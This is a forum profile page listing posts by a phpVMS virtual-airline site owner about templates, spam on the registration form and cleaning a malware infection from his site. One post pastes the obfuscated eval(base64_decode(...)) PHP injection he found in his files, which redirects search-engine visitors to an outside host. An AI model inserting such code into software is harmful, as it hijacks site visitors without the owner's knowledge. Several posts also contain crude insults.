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Everything posted by RogerB

  1. No, its just blank
  2. can't view my pilots in the admin panel....... updated 3 times...
  3. Kesuk was attacked again yesterday evening by the same code. I talked to a gentleman yesterday and he thinks the registration and contact forms could possibly have vulnerabilities, what do you guys think. Would anyone be interested in helping me check my site? I really could use it.
  4. Ok, this one works.
  5. This module doesn't work right
  6. Where are the files?? I see none
  7. RogerB

    ObsessBlue 2.0

    The only thing I did to the css was add detailed info on how to edit. If you want to update don't use the css
  8. Has anyone found a way to stop this? I haven't put my apply link back till I know that spam won't be attacking the reg page.
  9. Not bad at all captain. I would fix the header, the aircraft perspective in it is out of whack. You want those graphics crisp.
  10. RogerB

    change ID

    Do to the spam attack on the phpvms apply form a bunch of my pilot id's got used, so when pilots join i change their pilot id. Only issue is the system removes them from the new pilot section. I know why it does this but can we fix it?
  11. Another thing Angel, Nabeel always stresses this: Make small changes then check your work, when you start making large changes you can't keep track of what you've done some times.
  12. Thank you Joeri. I am not going to tell someone their site looks good when it doesn't ...Angel send me a PM and we can talk about how to improve. If i can improve the instructions for Obsess, no problem tell me how. Any other questions let me know. I am going to be hard on people because I want phpvms VA's to up their quality standards, if you have a problem with that Vansers tough tittys.
  13. He asked for an opinion, he got it and was ok with it Vansy....Who made you the forum police??
  14. It starts with quality graphics......I made that template with detailed instructions so I guess i don't understand how it looks so jacked up.
  15. There is no easy way to say this: The website is awful. Needs tons of work.
  16. Message is gone!! woo hoo. success!!!
  17. Yeah I am. Kesuk is clean. I had it verified with sitelock...man that was f--ed up..
  18. I did find info on this mal ware it was also getting into .css files. Kesuk is clean now. Only issue left was my favicon link. Weird.
  19. LOL...I am using site lock right now. waiting for my next scan. I really don't know why I can't cotrol the scans...so stupid...
  20. I didn't get it from ObsessBlue night fox....and I cleaned my sight Kurt....google should approve it some day.
  21. I believe its all gone, I am waiting for approval from them...if not they can suck donkey nuts.
  22. I didn't get it from that java script, I don't use it on kesuk. I still have no idea how that stuff got on my server. I believe its all gone now
  23. Decode where Tom? Where ever I see it?
  24. I just did an update to get rid of it. I am also finding it in my forum files. I think its all cleaned up. question is, how did it get there.
  25. Ok, I am finding this code in some of my files, I also found it in the action.php for phpvms, and I don't remember it being there before. eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnaGhnaGZzNmZnLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));
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